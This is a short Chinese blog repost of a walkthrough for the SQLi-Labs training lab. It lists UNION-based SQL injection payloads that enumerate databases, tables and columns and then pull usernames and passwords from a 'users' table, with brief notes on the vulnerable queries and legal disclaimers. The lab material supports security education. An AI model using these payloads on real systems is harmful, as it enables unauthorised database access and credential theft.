欢迎关注公众号:24h进德修业。没有拿不到的权限,只有不努力的白帽。
这里我们就可以直接发现报错的地方,直接将后面注释,然后使用
//这里用-1是为了查询一个不存在的id,好让第一句结果为空,直接显示第二句的结果
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23
-1' union select 1,username,password from users where id=3%23
可以得到这个sql语句其实并没有单引号,只是用数字进行查询,例如
select * from users where id=1
select * from users where id=('input') LIMIT 0,1;
免责声明:本站提供的安全工具、程序、方法可能带有攻击性,仅供安全研究与教学之用,风险自负!本文部分内容来自网络,在此说明。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
本文始发于微信公众号(24h进德修业):SQLi_Labs
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/335664.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论